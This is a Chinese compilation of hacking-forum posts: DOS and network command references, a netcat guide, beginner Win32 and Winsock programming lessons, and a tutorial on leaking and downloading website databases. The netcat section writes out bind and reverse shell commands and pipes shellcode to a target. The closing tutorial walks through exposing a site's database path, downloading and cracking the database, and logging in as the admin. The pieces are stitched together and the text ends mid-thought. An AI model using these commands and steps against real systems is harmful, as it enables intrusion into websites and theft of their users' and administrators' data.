net命令介绍
Dos常用命令
一、基础命令
1 dir
无参数:查看当前所在目录的文件和文件夹。
/s:查看当前目录已经其所有子目录的文件和文件夹。
/a:查看包括隐含文件的所有文件。
/ah:只显示出隐含文件。
/w:以紧凑方式(一行显示5个文件)显示文件和文件夹。
/p:以分页方式(显示一页之后会自动暂停)显示。
|more:前面那个符号是“/”上面的那个,叫做重定向符号,就是把一个
命令的结果输出为另外一个命令的参数。more也是一个命令,dir /w |more
得到的结果和dir /w /p的结果是一样的。
其他的参数大家可以用:dir/?查看。
2 cd
cd 目录名:进入特定的目录。如果看到有个目录显示为:abcdef ghi 就
输入:cdabcdef.ghi进入该目录。
cd/ 退回到根目录。
cd..退回到上一级目录。
3 md rd
md 目录名:建立特定的文件夹。 (dos下面习惯叫目录,win下面习惯叫文
件夹。呵呵!)
rd 目录名:删除特定的文件夹。
4 cls
清除屏幕。
5 copy
copy 路径/文件名 路径/文件名 :把一个文件拷贝到另一个地方。
6 move
move 路径/文件名 路径/文件名 :把一个文件移动(就是剪切+复制)到另
一个地方。
7 del
del 文件名:删除一个文件。
del *.*:删除当前文件夹下所有文件。
del不能删除文件夹。
8 deltree
删除文件夹和它下面的所有子文件夹还有文件,厉害。。。不要乱用。
9 format
format x: :x代表盘符,格式化一个分区。在dos下是用fat文件系统格式
化的,在windows2000安装的时候会问你要不要转换为ntfs。
10 type
type 文本文件名:显示出文本文件的内容。
11 edit
其实这是个小程序,编辑文本文件用的。
12 ren
ren 旧文件名 新文件名:改文件名。
二、关于网络的常用命令
1 ping
ping 主机ip或名字:向目标主机发送4个icmp数据包,测试对方主机是否收
到并响应,一般常用于做普通网络是否通畅的测试。但是ping不同不代表网
络不通,有可能是目标主机装有防火墙并且阻止了icmp响应。
ping -t :不停的发送数据包。当然都很小,不能称作攻击。有些人自己写
了一些类似于ping命令的程序,不停的发送很大的数据包,以阻塞目标主机
的网络连接。
2 net
建议是用net /?获取具体帮助信息。实在是有很多参数,参数下面还有参
数。常用:net view //主机 来看共享,net start/stop 服务 来启动和停
止服务,信使服务个人不太喜欢。
3 netstat
netstat 主机:查看主机当前的tcp/ip连接状态,如端口的状态。
4 nbtstat
nbtstat 主机:查看主机使用的NetBIOS name。
5 tracert
tracert 主机:查看从你自己到目标逐机到底经过了那些路径。如:
tracert www.ncie.gov.cn 然后等待。。。就会看到你经过的一个个路由节
点,一般大一点的路由器,如电信的主干路由,除了ip以外,都有英文标示
的。
6 pathping
pathping 主机:类似tracert,但可以显示一些tracert不能显示出来的信
息。可以自己试试。
7 ftp
字符方式的ftp,我喜欢用;)不用装cuteftp了。
8 telnet
字符方式的远程登录程序,是网络人员极其爱用的远程登录程序。我最近常
用来调试邮件服务器。
9 ipconfig 非常有用的网络配置、排错。。。命令。
不加参数显示当前机器的网络接口状态。
/all 先是详细的信息。
/release 释放当前ip。
/renew 重新申请ip。
/flushdns 刷新dns缓存。
/registerdns 重新栽dns服务器上注册自己。
。。。。。。
10 arp 操作当前的arp缓存。
-a 显示arp缓存。
-d 删除一条缓存纪录。
-s 田家一条缓存纪录。
11 nslookup 排除dns错误的利器。是一个交互的工具。使用之前请先努力弄清楚dns的作用以及dns的工作原理。
xcopy是一个外部命令,也就是说,是一个小程序,有的时候会发现软盘上没有,硬盘上也没有。。。昏倒。。。当然勇气来使比copy好用,我喜欢加/e参数。
smartdrv.exe 加载磁盘缓存,参数是缓存的大小,单位是kb。
如:smartdrv 32768 就是加载32M的缓存。
缓存的作用在你安装WIN2K的时候非常明显!不加缓存装WIN2K PRO要3小时左右,加载8M缓存后,只要30分钟。
原理是在内存中划分出一块区域,在安装期间不断地把硬盘上的数据读取到那块缓存区域中,充分利用了内存。
AT和任务计划作用一样。
以下是使用方法,可以通过在命令提示符下面输入:AT /?获得帮助。
AT 命令安排在特定日期和时间运行命令和程序。
要使用 AT 命令,计划服务必须已在运行中。
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
AT [//computername] [ [id] [/DELETE] | /DELETE [/YES]]
AT [//computername] time [/INTERACTIVE]
[ /EVERY:date[,…] | /NEXT:date[,…]] “command”
//computername 指定远程计算机。 如果省略这个参数,会计划在本地计算机上运行命令。
//127.0.0.1代表本机。和不加这个参数意思一样。
id 指定给已计划命令的识别号。
用来识别任务,比如你要添加好几个任务,ID=1就代表第一个喽!
/delete 删除某个已计划的命令。如果省略 id,
计算机上所有已计划的命令都会被删除。
/yes 不需要进一步确认时,跟删除所有作业
的命令一起使用。
time 指定运行命令的时间。
/interactive 允许作业在运行时,与当时登录的用户
桌面进行交互。
/every:date[,…] 每个月或每个星期在指定的日期运行命令。
如果省略日期,则默认为在每月的本日运行。
/next:date[,…] 指定在下一个指定日期(如,下周四)运行命令。
如果省略日期,则默认为在每月的本日运行。
“command” 准备运行的 Windows NT 命令或批处理程序。
nc(瑞士军刀)的详细使用
一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,
能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几
乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。
在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由’红与黑’编译
后的新’浓缩’版。’浓缩’版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,
有此功能的原版NC好象要60KB:P),虽然”体积”小,但很完成很多工作。
<!–StartFragment–>=====================================================================================================
软件介绍:
工具名:Netcat
作者:Hobbit && Chris Wysopal
网址:
http://www.atstake.com/research/tools/network_utilities/
类别:开放源码
平台:Linux/BSD/Unix/Windows
WINDOWS下版本号:[v1.10 NT]
=====================================================================================================
参数介绍:
‘nc.exe -h’即可看到各参数的使用方法。
基本格式:nc [-options] hostname port[s] [ports] …
nc -l -p port [options] [hostname] [port]
-d 后台模式
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出–用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉–用于扫描时
端口的表示方法可写为M-N的范围格式。
=====================================================================================================
基本用法:
大概有以下几种用法:
1)连接到REMOTE主机,例子:
格式:nc -nvv 192.168.x.x 80
讲解:连到192.168.x.x的TCP80端口
2)监听LOCAL主机,例子:
格式:nc -l -p 80
讲解:监听本机的TCP80端口
3)扫描远程主机,例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
讲解:扫描192.168.x.x的TCP80到TCP445的所有端口
4)REMOTE主机绑定SHELL,例子:
格式:nc -l -p 5354 -t -e c:/winnt/system32/cmd.exe
讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
5)REMOTE主机绑定SHELL并反向连接,例子:
格式:nc -t -e c:/winnt/system32/cmd.exe 192.168.x.x 5354
讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
以上为最基本的几种用法(其实NC的用法还有很多,
当配合管道命令”|”与重定向命令”<“、”>”等等命令功能更强大……)。
=====================================================================================================
高级用法:
6)作攻击程序用,例子:
格式1:type.exe c:/exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:/exploit.txt
讲解:连接到192.168.x.x的80端口,并在其管道中发送’c:/exploit.txt’的内容(两种格式确有相同的效果,
真是有异曲同工之妙:P)
附:’c:/exploit.txt’为shellcode等
7)作蜜罐用[1],例子:
格式:nc -L -p 80
讲解:使用’-L'(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止
8)作蜜罐用[2],例子:
格式:nc -L -p 80 > c:/log.txt
讲解:使用’-L’可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到’c:/log.txt’中,如果把’>’
改为’>>’即可以追加日志
附:’c:/log.txt’为日志等
9)作蜜罐用[3],例子:
格式1:nc -L -p 80 < c:/honeypot.txt
格式2:type.exe c:/honeypot.txt|nc -L -p 80
讲解:使用’-L’可以不停地监听某一个端口,直到ctrl+c为止,并把’c:/honeypot.txt’的内容’送’入其
管道中
注意:要想溢出,最好是在外网,内网要搞端口映射才可以哦!
想学到真正的黑客技术?进来看看!
1,不要研究QQ,毕竟QQ不是技术,盗了几个号又算什么?程序不是自己编写的,没什么值得骄傲的.
2,不要研究怎么激活成功教程网吧,难道不觉得:一般关于激活成功教程网吧的帖子都很少人回复的么?
3,研究一些系统知识,比如windows什么版本和什么版本有什么区别……
4,研究组策略,研究注册表,研究CMD,研究ASP,研究PHP,研究JAVA……
5,经常来BBS闲逛,例如X,黑防……
6,不要以为扫到**主机的**端口开放就可以利用什么,微软不是傻的!
7,尽量不要吧时间浪费在暴力激活成功教程上,因为机会很渺茫!无路可走时才可以用用。
8,不要认为黑客就是非法入侵,就是盗QQ,盗帐号。
9,祖国需要计算机人才,而不需要盗帐号的高手。
10,不要奢望有什么快速的途径学习技术,欲速则不达!没有丰富的经验是没有办法提高的。
如果说错什么,大家都可以指出来~!
对学习技术的一些建议(按顺序去学):
1,认真看看过去的入侵实例(如IPC入侵,输入法漏洞),这样可以好好研究windows基础。
2,学好注册表,因为注册表是windows的数据库,windows相关的数据都在那。
3,多少学些编程,basic都可以,目的是做好基础,了解了解什么是编程。
4,看看一些溢出工具编写的教程(不是让你去写,而是让你了解溢出的真正原理),明白原理之后自己用虚拟机实践一下溢出。
5,有了编程的经验后,就可以看看sql注入攻击了,并且要学习怎么使用NBSI.
学好了这些,基本上就算入门了,想真正提高,只有努力学好编程,不要认为编程离我们很远……也许你会认为用别人的工具也不错,但是不会编程,就永远发现不了windows的系统漏洞,老是使用公布过的漏洞利用程序,想提高还真难啊.
再给一个建议……..做一个虚拟机,独立安装一个2000的系统(版本越老越好),然后尽量完善那个系统,看看自己能不能成功入侵(这是积累经验的办法).
这篇帖子没有知识,只是提供一个方向.学技术需要时间,心急是万万不可Di~~~
我的电脑里有数千个资料文件,都是网上找的.所以我再再建议…:经常逛逛下载站,找找相关资料,并且下载,还有经常去技术blog,把有用的复制保存下来,多少浏览一遍,感兴趣的就认真看(还要用本子记下有用的资料),不感兴趣的就扫一遍.
这个方法其实比你买<X>学技术还要快.
好多人问为什么我老是菜鸟,想知道答案?该学的东西你没去认真的学,不该学的你又浪费时间在钻研,当然提高不了了!
附:什么是有用的资料(例如:windows2000的日志存放处,VPN开启的必须条件,windows_HOME版本的XP不支持”用户与组”功能和没有IIS……)
黑客初级知识5
对于多线程的基本概念,我不在赘述,是个只要学习过一门编程语言就应该多进程和线程有个基本的了解.这里重点介绍一下如何实现多线程.
通常一个程序的主线程有操作系统创建,如果想让其创建额外的线程,可以调用CreateThread()函数来完成.函数原形如下:
HANDLE CreateThread()
{
LPSECURITY_ATTRIBUTES LPThreadAttributes, //指向SECURITY_ATTRIBUTES的指针
SIZE_T dwStackSize, //表示线程为自己所用堆栈分配的地址空间的大小 系统缺省值为0
LPTHREAD_START-TOUTINE lpStartAddress, //表示新线程开始执行时代码所在函数的地址 即线程函数名
LPVOID lpParameter, //是传入线程函数的参数
DWORD dwCreationFlags, //指定控制线程创建的附加标志 取0线程立即执行 取CREATE_SUSPENDED线程挂起
LPDWORD lpThreadld //是个DWORD类型的地址,返回赋给该新线程的ID
}
线程函数lpParameter必须有以下原形:
DWORD WINAPI XXXThreadFun(LPVOID lpParameter)
{
return(0);
}
________________________________________________________________________________________________
下面我们来创建一个线程:
#include <windows.h>
#include <stdio.h>
DWORD WINAPI ThreadFunc( LPVOID lpParam ) //线程函数,跟普通的函数没什么两样
{
printf( “Parameter = %d.”, *(DWORD*)lpParam );
return 0;
}
VOID main( VOID )
{
DWORD dwThreadId, dwThrdParam = 1;
HANDLE hThread;
hThread = CreateThread( NULL,0,ThreadFunc,&dwThrdParam, 0,&dwThreadId);
if (hThread == NULL)
{
printf( “CreateThread failed (%d)/n”, GetLastError() );
}
else
{
_getch();
CloseHandle( hThread );
}
}
关于线程同步的问题,这里就不再讲解,请大家自己查阅资料,不查阅以后可能会有困难啊.培养一下各位的自己动手能力.
黑客初级知识4
在网络编程中,最常用和最基础的就是WINSOCK. 现在我们讨论WINDOWS下的SOCKET编程.
大凡在WIN32平台上的WINSOCK编程都要经过下列步骤:
定义变量->获得WINDOCK版本->加载WINSOCK库->初始化->创建套接字->设置套接字选项->关闭套接字->卸载WINSOCK库->释放资源
下面介绍WINSOCK C/S的建立过程:
服务器 客户端
________________________________________________
1 初始化WSA 1 初始化WSA
____________________________________________________
2 建立一个SOCKET 2 建立一个SOCKET
_____________________________________________________
3 绑定SOCKET 3 连接到服务器
_____________________________________________________
4 在指定的端口监听 4 发送和接受数据
_____________________________________________________
5 接受一个连接 5 断开连接
______________________________________________________-
6 发送和接受数据
___________________________________________________
7 断开连接
__________________________________________________
大家注意,在VC中进行WINSOCK编程时,需要引入如下两个库文件:WINSOCK.H(这个是WINSOCK API的头文件,WIN2K以上支持WINSOCK2,所以
可以用WINSOCK2.H);Ws2_32.lib(WINSOCK API连接库文件).
使用方式如下:
#include <winsock.h>
#pragma comment(lib,”ws2_32.lib”)
下面我们通过具体的代码演示服务器和客户端的工作流程:
首先,建立一个WSADATA结构,通常用wsaData
WSADATA wsaData;
然后,调用WSAStartup函数,这个函数是连接应用程序与winsock.dll的第一个调用.其中,第一个参数是WINSOCK 版本号,第二个参数是指向
WSADATA的指针.该函数返回一个INT型值,通过检查这个值来确定初始化是否成功.调用格式如下:WSAStartup(MAKEWORD(2,2),&wsaData),其中
MAKEWORD(2,2)表示使用WINSOCK2版本.wsaData用来存储系统传回的关于WINSOCK的资料.
if(iResuit=WSAStartup(MAKEWORD(2,2),&wsaData)!=0)
{
printf(“WSAStartup failed:%d”,GetLastError()); //返回值不等与0,说明初始化失败
ExitProcess(); //退出程序
}
应用程序在完成对请求的SOCKET库使用后,要调用WSACleanup函数来接触SOCKET库的绑定,并且释放资源.
注意WSAStartup初始化后,必须建立一个SOCKET结构来保存SOCKET句柄.
下面我们建立一个SOCKET.
首先我们建立一个m_socket的SOCKET句柄,接着调用socket()函数,函数返回值保存在m_socket中.我们使用AF_INFE,SOCK_STREAM,IPPROTO_TCP
三个参数.第一个表示地址族,AF_INFE表示TCP/IP族,第二个表示服务类型,在WINSOCK2中,SOCKET支持以下三种类型;
SOCK_STREAM 流式套接字
SOCK_DGRAM 数据报套接字
SOCK_RAW 原始套接字
第三个参数表示协议:
IPPROTO_UDP UDP协议 用于无连接数据报套接字
IPPROTO_TCP TCP协议 用于流式套接字
IPPROTO_ICMP ICMP协议用于原始套接字
m_socket=socket(AF_INFE,SOCK_STREAM,IPPROTO_TCP); //创建TCP协议
以下代码用于检查返回值是否有错误:
if(m_scoket==INVALID_SOCKET)
{
prinrf(“Error at socket():%d/n”,GetLastError());
WSACleanup(); //释放资源
return;
}
说明,如果socket()调用失败,他将返回INVALID_SOCKET.
为了服务器能接受一个连接,他必须绑定一个网络地址,下面的代码展示如何绑定一个已经初始化的IP和端口的Socket.客户端程序用这个
IP地址和端口来连接服务器.
sockaddr_in service;
service.sin_family=AF_INET; //INTERNET地址族
service.sin_addr.s_addr=inet_addr(“127.0.0.1”); //将要绑定的本地IP地址
service.sin_port=htons(27015); //27015将要绑定的端口
下面我们调用BIND函数,把SOCKET和SOCKADDR以参数的形式传入,并检查错误.
if(bind(m_socket,(SOCKADDR*)&SERVICE,sizeof(service))==SOCKET_ERROR)
{
printf(“bind() failed./n”);
closesocket(m_socket);
return;
}
当绑定完成后,服务器必须建立一个监听队列,以接受客户端的请求.listen()使服务器进入监听状态,该函数调用成功返回0,否则返回
SOCKET_ERROR.代码如下:
if(listen(m_socket,1)==SOCKET-ERROR)
{
printf(“error listening on socket./n”);
}
服务器端调用完LISTEN()后,如果此时客户端调用CONNECT()函数,服务器端必须在调用ACCEPT().这样服务器和客户端才算正式完成通信程序的
连接动作.
一旦服务器开始监听,我们就要指定一个句柄来表示利用ACCEPT()函数接受的连接,这个句柄是用来发送和接受数据的表示.建立一个SOCKET句柄
Socket AcceptSocket 然后利用无限循环来检测是否有连接传入.一但有连接请求,ACCEPT()函数就会被调用,并且返回这次连接的句柄.
printf(“waitong for a client to connect…/n”);
while(1)
{
AcceptSocket=SOCKET_ERROR;
while(AcceptSocket==SOCKET_ERROR)
{
AcceptSocket=accept(m_socket,NULL,NULL);
}
}
下面看客户端端代码:
sockaddr_in clientService;
clientService.sin_family=AF_INET; //INTERNET地址族
clientService.sin_addr.s_addr=inet_addr(“127.0.0.1”); //将要绑定的本地IP地址
clientService.sin_port=htons(27015); //27015将要绑定的端口
下面调用CONNECT()函数:
if ( connect( m_socket, (SOCKADDR*) &clientService, sizeof(clientService) ) == SOCKET_ERROR)
{
printf( “Failed to connect./n” );
WSACleanup();
return;
} //如果调用失败清理退出
//调用成功继续读写数据
_________________________________________________________________________________________________
到这里,服务器和客户端的基本流程介绍完毕,下面我们介绍数据交换.
send():
int send
{
SOCKET s, //指定发送端套接字
const char FAR?*buf, //指明一个存放应用程序要发送的数据的缓冲区
int len, //实际要发送的数据字节数
int flags //一般设置为0
};
C/S都用SEND函数向TCP连接的另一端发送数据.
recv():
int recv
{
SOCKET s, //指定发送端套接字
char FAR?*buf, //指明一个缓冲区 存放RECC受到的数据
int len, //指明BUF的长度
int flags //一般设置为0
};
C/S都使用RECV函数从TCP连接的另一端接受数据
_______________________________________________________________________________________________
下面将完整的程序代码提供如下,大家可直接编译运行
首先看客户端的代码:
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, “ws2_32.lib”)
void main() {
// 初始化 Winsock.
WSADATA wsaData;
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR )
printf(“Error at WSAStartup()/n”);
// 建立socket socket.
SOCKET client;
client = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if ( client == INVALID_SOCKET ) {
printf( “Error at socket(): %ld/n”, WSAGetLastError() );
WSACleanup();
return;
}
// 连接到服务器.
sockaddr_in clientService;
clientService.sin_family = AF_INET;
clientService.sin_addr.s_addr = inet_addr( “127.0.0.1” );
clientService.sin_port = htons( 27015 );
if ( connect( client, (SOCKADDR*) &clientService, sizeof(clientService) ) == SOCKET_ERROR) {
printf( “Failed to connect./n” );
WSACleanup();
return;
}
// 发送并接收数据.
int bytesSent;
int bytesRecv = SOCKET_ERROR;
char sendbuf[32] = “Client: Sending data.”;
char recvbuf[32] = “”;
bytesSent = send( client, sendbuf, strlen(sendbuf), 0 );
printf( “Bytes Sent: %ld/n”, bytesSent );
while( bytesRecv == SOCKET_ERROR ) {
bytesRecv = recv( client, recvbuf, 32, 0 );
if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET ) {
printf( “Connection Closed./n”);
break;
}
if (bytesRecv < 0)
return;
printf( “Bytes Recv: %ld/n”, bytesRecv );
}
return;
}
下面是服务器端代码:
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, “ws2_32.lib”)
void main() {
// 初始化
WSADATA wsaData;
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR )
printf(“Error at WSAStartup()/n”);
// 建立socket
SOCKET server;
server = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if ( server == INVALID_SOCKET ) {
printf( “Error at socket(): %ld/n”, WSAGetLastError() );
WSACleanup();
return;
}
// 绑定socket
sockaddr_in service;
service.sin_family = AF_INET;
service.sin_addr.s_addr = inet_addr( “127.0.0.1” );
service.sin_port = htons( 27015 );
if ( bind( server, (SOCKADDR*) &service, sizeof(service) ) == SOCKET_ERROR ) {
printf( “bind() failed./n” );
closesocket(server);
return;
}
// 监听 socket
if ( listen( server, 1 ) == SOCKET_ERROR )
printf( “Error listening on socket./n”);
// 接受连接
SOCKET AcceptSocket;
printf( “Waiting for a client to connect…/n” );
while (1) {
AcceptSocket = SOCKET_ERROR;
while ( AcceptSocket == SOCKET_ERROR ) {
AcceptSocket = accept( server, NULL, NULL );
}
printf( “Client Connected./n”);
server = AcceptSocket;
break;
}
// 发送接受数据
int bytesSent;
int bytesRecv = SOCKET_ERROR;
char sendbuf[32] = “Server: Sending Data.”;
char recvbuf[32] = “”;
bytesRecv = recv( server, recvbuf, 32, 0 );
printf( “Bytes Recv: %ld/n”, bytesRecv );
bytesSent = send( server, sendbuf, strlen(sendbuf), 0 );
printf( “Bytes Sent: %ld/n”, bytesSent );
return;
}
本程序仅仅描述了同步的情况!
黑客初级知识3
首先介绍一下网络协议:网络协议是网络上所有设备之间通信规则的集合,他定义了通信时信息必须采用的格式和这些格式的意义.大多数
网络协议都采用分层体系结,每一层都建立在他的下层之上,向他的上一层提供服务,而把如何实现这一服务的细节对上层加以屏蔽.一台设备上
的第N层与另一台设备上的第N层进行通信的规则就是第N曾协议.在网络上的个层之间中存在着许多协议,接受方和发送方同层的协议必须一致,
否则,一方就无法识别另一方发出的信息.网络协议使网络上的设备各种设备能相互交换信息.
常用的协议有:TCP/IP协议,IPX/SPX歇息等等.在局域网中常用的IPX/SPX协议.而访问INTERNET,就必须添加TCP/IP协议.
TCP/IP协议是传输控制协议/互联网络协议.他规范了网络上所有设备的通信,尤其是一个主机与另一个主机之间的数据往来格式以及传送
方式.
在网络的各层中还存在着许多协议,下面列出部分网络协议规范:
ARP 地址解析协议
SNMP 网络管理协议
BOOTP 让无盘站从一个中心服务器上获得IP地址
DHCP 动态主机配置协议
下面介绍网络7层协议在WINDOWS的实现:
7层协议 WIN系统
________________________________________
7 应用层 7 应用程序
________________________________________________
6 表示层 6 WINSOCK API(DLL)
___________________________________________
5 会话层 5 SPI(DLL)
__________________________________________________
4 传输层 4 TDI(VXD,SYS)
___________________________________________________
3 网络层 3 NDIS(VXD,SYS)
__________________________________________________
2 数据链路层 2 网卡驱动程序(VXD,SYS)
___________________________________________
1 物理层 1 网卡
_________________________________________________
相信这个映射图可以让大家比较清楚了解他们的对应关系
TCP协议图示
应用程序协议 HTTP FTP TELNET
传输协议 TCP UDP
网际协议 IP
物理层协议 网卡
IP协议保证数据的传输,TCP协议保证数据传输的质量.
TCP/IP协议基于四层结构:应用层,传输层,网络层,接口层,数据在传输时每通过一层就要在数据上加个头,其中的数据供接受端同层使用,在
接收端,每经过一层就把头去掉,来保证传输数据格式的一致.
TCP头部结构:
16位源端口号 16位目的端口号
_______________________________________________________________________________
32位序列号
___________________________________________________________________________
32位确认号
_____________________________________________________________________________________
4位首部长度+6位保留字 6位标志 16位窗口大小
_______________________________________________________________________________________
16位效验和 16位紧急数据偏移量
_____________________________________________________________________________________
数据段
_______________________________________________________________________________
IP头部结构:
4位IP版本号 4位首部长度 8位服务类型 16位总长度
___________________________________________________________________________________________
16位标示 3位标志和偏移
__________________________________________________________________________
8位生存时间 8位协议 16位IP首部效验和
________________________________________________________________________________________________
32位源IP地址
_________________________________________________________________________________________________________
32位目的IP地址
________________________________________________________________________________________
TCP头和数据
黑客初级知识2
下面介绍一下WIN API.
我们需要自己编写一个工具时,必然会用到很多操作windows和控制windows的函数,这些函数就是windows API.
API是Application Progamming Interface的缩写.就是说API是一系列已经定义的在windows内部的函数,是应用程序和系统之间的
桥梁,应用程序通过调用API来请求系统完成一系列的任务.窗口,菜单,文件操作等都是通过API实现的.
WIN32 API就是WINDOWS 32位平台的应用程序接口.现在可视化编程工具提供了大量控件,他们代替了API的功能.这些控件都是构建
在WIN32 API之上的.是封装了的API函数集合.但是对于比较复杂和特殊功能(想我们的黑客编程)来说,就必须用API函数来实现.
WIN API存放在动态链接库(DLL)中,在98系统中,有32位的GDI32.DLL,KERNEL32.DLL,16位的GDI.EXE,KRNL386.EXE.API就存放在这些
动态链接库中.
木马和后门其实就是使用了文件操作函数,这里做简要介绍:
删除文件:BOOL DeleteFile(LPCTSH lpFileName)
复制文件:BOOL CopyFile()
移动文件:BOOL MoveFile()等等
具体的API可以上网自己去查看,有很多介绍API的书籍.
黑客初级知识1
Windows 是一个“基于事件的,消息驱动的”操作系统。
在Windows下执行一个程序,只要用户进行了影响窗口的动作(如改变窗口大小或移动、单击鼠标等)该动作就会触发一个相应的“事件”
系统每次检测到一个事件时,就会给程序发送一个“消息”,从而使程序可以处理该事件。
每个Windows 应用程序都是基于事件和消息的,而且包含一个主事件循环,它不停地、反复地检测是否有用户事件发生。每次检测到一个
用户事件,程序就对该事件做出响应,处理完再等待下一个事件的发生。
Windows 下的应用程序不断地重复这一过程,直至用户终止程序,用代码来描述实际上也就是一个消息处理过程的while循环语句。
下面便简单介绍一下与 Windows 系统密切相关的几个基本概念:
1:窗口:这是我要说的第一个概念。窗口是Windows本身以及Windows 环境下的应用程序的基本界面单位,但是很多人都误以为只有具有
标题栏、状态栏、最大化、最小化按钮这样标准的方框才叫窗口。其实窗口的概念很广,例如按钮和对话框等也是窗口,只不过是一种特殊化
窗口罢了。
从用户的角度看,窗口就是显示在屏幕上的一个矩形区域,其外观独立于应用程序,事实上它就是生成该窗口的应用程序与用户间的直观
接口;从应用程序的角度看,窗口是受其控制的一部分矩形屏幕区。应用程序生成并控制与窗口有关的一切内容,包括窗口的大小、风格、位
置以及窗口内显示的内容等。用户打开一个应用程序后,程序将创建一个窗口,并在那里默默地等待用户的要求。每当用户选择窗口中的选
项,程序即对此做出响应。
2:程序:通常说的程序都是指一个能让计算机识别的文件,接触得最多的便是.exe型的可执行文件.
3:进程:说到进程,学过《操作系统》的人都很清楚,所谓进程就是应用程序的执行实例(或称一个执行程序) 需要注意的是:进程是
程序动态的描述,而上面说到的程序是静态的描述,两者有本质的区别。举个例子,从网上 Down了一个瑞星杀毒软件到C盘但没有运行,那
个.exe 可执行文件叫做程序,它是一个二进制码的文件。一旦双击了exe文件图标运行程序,那个“正在运行着的瑞星杀毒”便称为进程,它
在双击的那一刻被系统创建,当你关机或者在任务栏的图标上单击鼠标右键选“退出”时,进程便消亡,彻底结束了生命。进程经历了由“创
建”到“消亡”的生命期,而程序自始至终存在于你的硬盘上,不管你的机器是否启动。
4:线程:线程是进程中的一个执行单元,同一个进程中的各个线程对应于一组CPU指令、一组CPU寄存器以及一堆栈。进程本来就具有动态
的含义,然而实质上是通过线程来执行体现的,从这个意义上说,Windows 中进程的动态性意义已经不是很明显了,只算是给程序所占的资源
划定一个范围而已,真正具有动态性意义的是线程。
5:消息:我们几乎做每一个动作都会产生一个消息,鼠标被移动会产生WM_MOUSEMOVE消息,鼠标左键被按下会产生WM_LBUTTONDOWN的消
息,鼠标右键按下便产生WM_RBUTTONDOWN消息等等。所有的这些都可以通过GetMessage,SendMessage等函数得到.
6:事件:如在程序运行的过程中改变窗口的大小或者移动窗口等,都会触发相应的“事件”。
7:句柄:单单一个“柄”字便可以解释它的意思了,我们天气热摇扇子的时候只要抓住扇柄便可以控制整个扇子的运动了,在程序中也
差不多是这个意思。通常一个句柄就可以传递我们所要做的事情。有经验的成员肯定清楚,编写程序总是要和各种句柄打交道的,句柄是
系统用来标识不同对象类型的工具,如窗口、菜单等,这些东西在系统中被视为不同类型的对象,用不同的句柄将他们区分开来。
C++ 教材中给句柄下的定义是:“在Win32里,句柄是指向一个无值型对象(void *)的指针,是一个4字节长的数据”。从结构
上看,句柄的确是一个指针,尽管它没有指向用于存储某个对象的内存位置,而实际上句柄指向的是一个包含了对该对象进行的引用的位置。
在编程时,只要抓住了对象的句柄就可以对该对象进行操作了.
8:API与SDK:API是英文 Application Programming Interface 的简称,意为“应用程序接口”,泛指系统为应用程序提供的一系列接
口函数。其实质是程序内的一套函数调用,在编程的时候可以直接调用,而不必知道其内部实现的过程,只知道它的原型和返回值就可以
了.
SDK是英文 Software Development Kit 的缩写,指“软件开发工具包”,在防火墙的设计中就经常涉及到SDK。
《绝对暴库》 没有在网站发表的
什么是暴库呢?就是利用不正当的手段使对方把数据库的绝对路经显示出来,然后我门知道了绝对路径,就可以下载下来,这样这个网站的数据库中的资料就被我门轻松掌握了。
那么怎么样使用暴库呢?这个在新人2中有介绍,今天就来说说具体的用法。首先要知道怎样才能暴库呢?那就是把网站的第一个/换成%5c,如果有漏洞就可以直接显示出数据库的绝对路径了,我们把绝对路径中数据库的部分写到网站后面就可以下载数据库了。还有一种方法,就是填写默认的数据库路径,就是conn.asp这样的默认数据库路径,每种形式的论坛,都有自己默认的数据库默认路径,大家去网上随便找找就可以找到了。但是在这个conn.asp默认路径的前面也是要把/换成%5c的。
为什么暴出来的数据库后缀名是.asp形式的?这个是经过修改的,可能做了防下载处理,大家还是先把默认的路径添上以后看显示什么,如果没有做过防下载处理,会显示一堆乱码,大家可以把地址复制下来用讯雷下载下来,把.asp换成.mdb就可以打开了。
为什么我暴出来数据库路径,也添入了正确的路径下载不下来啊?数据库路径是这样的D:/web/abc/#sjgf.mdb。这个是因为其中有个#在作怪,在ASCII中#相当与00 ,终止的意思,这里大家可以把这个#换成%23就可以下载了。
为什么我暴出了数据库,地址什么都写对着呢,还是下不了啊?那么可能是因为数据库做了防下载处理,所以下载不下来。
为什么下载下来的数据库要求输入密码呢?是因为数据库进行了加密,激活成功教程很简单,明小子的DOMIAN就有激活成功教程功能。
得到数据库有什么用呢?用处大了,比如是个论坛的数据库,里面就记录了所有论坛里的信息,而我们需要的大概是ADMIN的信息吧?呵呵,还=什么呢啊?快去打开数据库中admin的啊,看下ADMIN的用户名,然后在user里把ADMIN的ID找出来,然后就可以以他的身份登陆论坛了哦!
进后台还可以这样玩
就算给偶等小菜练手吧。。。。随便找了个页面
